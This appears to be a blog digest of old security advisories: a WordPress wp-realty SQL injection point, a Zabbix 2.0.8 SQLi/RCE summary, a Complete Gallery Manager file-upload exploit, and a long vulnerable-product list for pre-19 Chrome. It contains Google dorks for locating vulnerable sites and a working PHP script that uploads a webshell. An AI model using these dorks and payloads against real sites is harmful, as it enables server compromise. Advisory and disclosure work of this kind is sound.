WordPress WP Realty Plugin – Blind SQL Injection

# Exploit Title: WordPress - wp-realty - MySQL Time Based Injection

# Google Dork: inurl:"/wp-content/plugins/wp-realty/"
# Vendor: http://wprealty.org/
# Date: 10/08/2013
# Exploit Author: Napsterakos
Link: http://localhost/wordpress/wp-content/plugins/wp-realty/
Exploit: http://localhost/wordpress/wp-content/plugins/wp-realty/index_ext.php?action=contact_friend&popup=yes&listing_id=[SQLi]

Zabbix 2.0.8 SQL Injection and Remote Code Execution

This exploits an unauthenticated SQL injection vulnerability affecting Zabbix versions 2.0.8 and lower.  The SQL injection issue can be abused in order to retrieve an active session ID.  If an administrator level user is identified, remote code execution can be gained by uploading and executing remote scripts via the 'scripts_exec.php' file.

 

WordPress Plugin Complete Gallery Manager 3.3.3 – Arbitrary File Upload Vulnerability

A arbitrary file upload web vulnerability is detected in the CodeCanyon WordPress Plugin Complete Gallery Manager v3.3.3 Web-Application.

The vulnerability allows remote attackers to upload files via POST method with multiple extensions to unauthorized access them on
application-side of the service.
The vulnerability is located in the /plugins/complete-gallery-manager/frames/ path when processing to upload via the  upload-images.php
file own malicious context or webshells. After the upload the remote attacker can access the file with one extension and exchange it with the
other one to execute for example php codes.
Exploitation of the vulnerability requires no user interaction and also without privilege application user account (no password standard).
Successful exploitation of the vulnerability results in unauthorized path or file access via local file include or arbitrary file upload.
Vulnerable Application(s):
                [+] CodeCanyon - Complete Gallery Manager
Vulnerable Module(s):
                [+] Image File Upload
Vulnerable File(s):
                [+] upload-images.php
Affected Module(s):
                [+] Application Index Listing (http://localhost:8000/)
Proof of Concept:
=================
The arbitrary file upload web vulnerability can be exploited by remote attackers without user interaction or privileged application user account.
For demonstration or reproduce ...
Vuln page :
http://wordpress.localhost:8080/wordpress/wp-content/plugins/complete-gallery-manager/frames/upload-images.php
Exploit :
<?php
$uploadfile="up.php";
$ch = curl_init("http://wordpress.localhost:8080/wordpress/wp-content/plugins/complete-gallery-manager/frames/upload-images.php");
curl_setopt($ch, CURLOPT_POST, true);  
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('qqfile'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Upload Access Path : http://wordpress.localhost:8080/wp-content/2013/09/up.php
Google Dork: allinurl:/wp-content/plugins/complete-gallery-manager/
Reference(s):
http://xxx.com/wp-content/plugins/complete-gallery-manager/frames/upload-images.php
http://www.xxx.com/wp-content/plugins/complete-gallery-manager/frames/upload-images.php
http://xxx.org/wp-content/plugins/complete-gallery-manager/frames/upload-images.php
Risk:
=====
The security risk of the arbitrary file upload web vulnerability is estimated as high(+).

Google Chrome Prior to 19 Multiple Security Vulnerabilities

Google Chrome is prone to multiple vulnerabilities.

Attackers can exploit these issues to execute arbitrary code in the context of the browser, bypass security restrictions or cause denial-of-service conditions; other attacks may also be possible.

Versions prior to Chrome 19 are vulnerable.

CVE: CVE-2011-3083
CVE-2011-3084
CVE-2011-3085
CVE-2011-3086
CVE-2011-3087
CVE-2011-3088
CVE-2011-3089
CVE-2011-3090
CVE-2011-3091
CVE-2011-3092
CVE-2011-3093
CVE-2011-3094
CVE-2011-3095
CVE-2011-3096
CVE-2011-3097
CVE-2011-3098
CVE-2011-3099
CVE-2011-3100
CVE-2011-3101
CVE-2011-3102
Remote: Yes
Local: No
Published: May 15 2012 12:00AM
Updated: Sep 22 2013 12:11AM
Vulnerable: Xerox FreeFlow Print Server (FFPS) 73.C0.41
Xerox FreeFlow Print Server (FFPS) 73.B3.61
VMWare ESX Server 4.1
VMWare ESX Server 4.0
VMWare ESX Server 3.5
VMWare ESX 4.1
VMWare ESX 4.0
VMWare ESX 3.5
Ubuntu Ubuntu Linux 8.04 LTS sparc
Ubuntu Ubuntu Linux 8.04 LTS powerpc
Ubuntu Ubuntu Linux 8.04 LTS lpia
Ubuntu Ubuntu Linux 8.04 LTS i386
Ubuntu Ubuntu Linux 8.04 LTS amd64
Ubuntu Ubuntu Linux 12.04 LTS i386
Ubuntu Ubuntu Linux 12.04 LTS amd64
Ubuntu Ubuntu Linux 11.10 i386
Ubuntu Ubuntu Linux 11.10 amd64
Ubuntu Ubuntu Linux 11.04 powerpc
Ubuntu Ubuntu Linux 11.04 i386
Ubuntu Ubuntu Linux 11.04 ARM
Ubuntu Ubuntu Linux 11.04 amd64
Ubuntu Ubuntu Linux 10.04 sparc
Ubuntu Ubuntu Linux 10.04 powerpc
Ubuntu Ubuntu Linux 10.04 i386
Ubuntu Ubuntu Linux 10.04 ARM
Ubuntu Ubuntu Linux 10.04 amd64
SuSE openSUSE 12.1
Sun Solaris 9
Sun Solaris 11
Sun Solaris 10_x86
Sun Solaris 10_sparc
SRWare Iron 18.0.1050.0
SRWare Iron 15.0.900.1
SRWare Iron 15
RedHat Enterprise Linux Optional Productivity Application 5 server
RedHat Enterprise Linux Desktop Workstation 5 client
Red Hat Fedora 17
Red Hat Fedora 16
Red Hat Enterprise Linux Workstation Optional 6
Red Hat Enterprise Linux Workstation 6
Red Hat Enterprise Linux Server Optional 6
Red Hat Enterprise Linux Server 6
Red Hat Enterprise Linux HPC Node Optional 6
Red Hat Enterprise Linux HPC Node 6
Red Hat Enterprise Linux Desktop Optional 6
Red Hat Enterprise Linux Desktop 6
Red Hat Enterprise Linux Desktop 5 client
Red Hat Enterprise Linux 5 Server
Oracle Enterprise Linux 6.2
Oracle Enterprise Linux 6
Mandriva Linux Mandrake 2011 x86_64
Mandriva Linux Mandrake 2011
Mandriva Linux Mandrake 2010.1 x86_64
Mandriva Linux Mandrake 2010.1
MandrakeSoft Enterprise Server 5 x86_64
MandrakeSoft Enterprise Server 5
Google Chrome 17.0.963 79
Google Chrome 17.0.963 65
Google Chrome 16.0.912 75
Google Chrome 15.0.874 102
Google Chrome 18.0.1025.168
Google Chrome 18.0.1025.151
Google Chrome 18.0.1025.142
Google Chrome 17.0.963.83
Google Chrome 17.0.963.78
Google Chrome 17.0.963.60
Google Chrome 17.0.963.56
Google Chrome 17.0.963.46
Google Chrome 16.0.912.77
Google Chrome 16.0.912.75
Google Chrome 16.0.912.63
Google Chrome 16
Google Chrome 15.0.874.121
Google Chrome 15.0.874.120
Google Chrome 14.0.835.202
Google Chrome 14.0.835.186
Google Chrome 14.0.835.163
Google Chrome 14
Google Chrome 13.0.782.215
Google Chrome 13.0.782.112
Google Chrome 13.0.782.107
Google Chrome 13
Google Chrome 12.0.742.91
Google Chrome 12.0.742.112
Google Chrome 12.0.742.100
Google Chrome 12
Google Chrome 11.0.696.77
Google Chrome 11.0.696.71
Google Chrome 11.0.696.68
Google Chrome 11.0.696.65
Google Chrome 11.0.696.57
Google Chrome 11.0.696.43
Google Chrome 11.0.696.43
Google Chrome 11.0.672.2
Google Chrome 11
Google Chrome 10.0.648.205
Google Chrome 10.0.648.205
Google Chrome 10.0.648.205
Google Chrome 10.0.648.204
Google Chrome 10.0.648.133
Google Chrome 10.0.648.128
Google Chrome 10.0.648.127
Google Chrome 10.0.648.127
Google Chrome 10
Gentoo Linux
Debian Linux 6.0 sparc
Debian Linux 6.0 s/390
Debian Linux 6.0 powerpc
Debian Linux 6.0 mips
Debian Linux 6.0 ia-64
Debian Linux 6.0 ia-32
Debian Linux 6.0 arm
Debian Linux 6.0 amd64
CentOS CentOS 6
Avaya Voice Portal 5.1.2
Avaya Voice Portal 5.1.1
Avaya Voice Portal 5.1 SP1
Avaya Voice Portal 5.1
Avaya Voice Portal 5.1
Avaya Voice Portal 5.0 SP2
Avaya Voice Portal 5.0 SP1
Avaya Voice Portal 5.0
Avaya Proactive Contact 5.0
Avaya Meeting Exchange 5.2 SP2
Avaya Meeting Exchange 5.2 SP1
Avaya Meeting Exchange 5.2
Avaya Meeting Exchange 5.1 SP1
Avaya Meeting Exchange 5.1
Avaya Meeting Exchange 5.0 SP2
Avaya Meeting Exchange 5.0 SP1
Avaya Meeting Exchange 5.0
Avaya IQ 5.2
Avaya IQ 5.1.1
Avaya IQ 5.1
Avaya Conferencing Standard Edition 6.0 SP1
Avaya Conferencing Standard Edition 6.0
Avaya Communication Server 1000M Signaling Server 7.5
Avaya Communication Server 1000M Signaling Server 7.0
Avaya Communication Server 1000M Signaling Server 6.0
Avaya Communication Server 1000M 7.5
Avaya Communication Server 1000M 7.0
Avaya Communication Server 1000M 6.0
Avaya Communication Server 1000E Signaling Server 7.5
Avaya Communication Server 1000E Signaling Server 7.0
Avaya Communication Server 1000E Signaling Server 6.0
Avaya Communication Server 1000E 7.5
Avaya Communication Server 1000E 7.0
Avaya Communication Server 1000E 6.0
Avaya Aura System Platform 6.0.2
Avaya Aura System Platform 6.0.1
Avaya Aura System Platform 6.0 SP3
Avaya Aura System Platform 6.0 SP2
Avaya Aura System Platform 6.0
Avaya Aura System Platform 1.1
Avaya Aura System Manager 6.2
Avaya Aura System Manager 6.1.3
Avaya Aura System Manager 6.1.2
Avaya Aura System Manager 6.1.1
Avaya Aura System Manager 6.1 SP2
Avaya Aura System Manager 6.1 Sp1
Avaya Aura System Manager 6.1
Avaya Aura System Manager 6.0 SP1
Avaya Aura System Manager 6.0
Avaya Aura System Manager 5.2
Avaya Aura Session Manager 6.2.1
Avaya Aura Session Manager 6.1.3
Avaya Aura Session Manager 6.1.2
Avaya Aura Session Manager 6.1.1
Avaya Aura Session Manager 6.2
Avaya Aura Session Manager 6.1 SP2
Avaya Aura Session Manager 6.1 Sp1
Avaya Aura Session Manager 6.1
Avaya Aura Session Manager 6.0 SP1
Avaya Aura Session Manager 6.0
Avaya Aura Session Manager 5.2 SP2
Avaya Aura Session Manager 5.2 SP1
Avaya Aura Session Manager 5.2
Avaya Aura Session Manager 1.1
Avaya Aura Session Manager 1.0
Avaya Aura Presence Services 6.1.1
Avaya Aura Presence Services 6.1
Avaya Aura Presence Services 6.0
Avaya Aura Presence Services 5.2
Avaya Aura Messaging 6.1
+ Avaya Communication Manager Server DEFINITY Server SI/CS
+ Avaya Communication Manager Server S8100
+ Avaya Communication Manager Server S8300
+ Avaya Communication Manager Server S8500
+ Avaya Communication Manager Server S8700
Avaya Aura Messaging 6.0.1
Avaya Aura Messaging 6.0
Avaya Aura Experience Portal 6.0
Avaya Aura Communication Manager Utility Services 6.2
Avaya Aura Communication Manager Utility Services 6.1
+ Avaya Communication Manager Server DEFINITY Server SI/CS
+ Avaya Communication Manager Server S8100
+ Avaya Communication Manager Server S8300
+ Avaya Communication Manager Server S8500
+ Avaya Communication Manager Server S8700
Avaya Aura Communication Manager Utility Services 6.0
Avaya Aura Communication Manager 6.0.1
+ Avaya Communication Manager Server DEFINITY Server SI/CS
+ Avaya Communication Manager Server S8100
+ Avaya Communication Manager Server S8300
+ Avaya Communication Manager Server S8500
+ Avaya Communication Manager Server S8700
Avaya Aura Communication Manager 6.0
Avaya Aura Communication Manager 5.2
Avaya Aura Communication Manager 5.1
Avaya Aura Application Server 5300 SIP Core 2.1
Avaya Aura Application Server 5300 SIP Core 2.0
Avaya Aura Application Enablement Services 5.2.1
Avaya Aura Application Enablement Services 6.1.1
Avaya Aura Application Enablement Services 6.1
Avaya Aura Application Enablement Services 5.2.3
Avaya Aura Application Enablement Services 5.2.2
Avaya Aura Application Enablement Services 5.2
Apple Safari 5.0.6
Apple Safari 5.1.7 for Windows
Apple Safari 5.1.7
Apple Safari 5.1.5 for Windows
Apple Safari 5.1.4 for Windows
Apple Safari 5.1.4
Apple Safari 5.1.1 for Windows
Apple Safari 5.1.1
Apple Safari 5.1 for Windows
Apple Safari 5.1
Apple Safari 5.0.6 for windows
Apple Safari 5.0.5 for Windows
Apple Safari 5.0.5
Apple Safari 5.0.4 for Windows
Apple Safari 5.0.4
Apple Safari 5.0.3 for Windows
Apple Safari 5.0.3
Apple Safari 5.0.2 for Windows
Apple Safari 5.0.2
Apple Safari 5.0.1 for Windows
Apple Safari 5.0.1
Apple Safari 5.0 for Windows
Apple Safari 5.0
Apple iTunes 10.6
Apple iTunes 10.5
Apple iTunes 10.2.2
Apple iTunes 10.2
Apple iPod Touch 0
Apple iPhone 0
Apple iPad 0
Apple iOS 5.1.1
Apple iOS 5.1
Apple iOS 5.0.1
Apple iOS 5
Apple iOS 4.3.5
Apple iOS 4.3
Apple iOS 4.2
Apple iOS 4.1
Apple iOS 4
Apple iOS 3.2
Apple iOS 3.1
Apple iOS 3.0
Apple iOS 2.1
Apple iOS 2.0
Apple Apple TV 5.0
Not Vulnerable: Google Chrome 19

 

Solution:
Updates are available. Please see the references for more information.

Welcome to our blog

This blog will cover the following topics:

  • Attacker.NET offers & News
  • Security Advisories
  • Tutorials & How-To’s
  • Genetal IT news, Issues and Best practices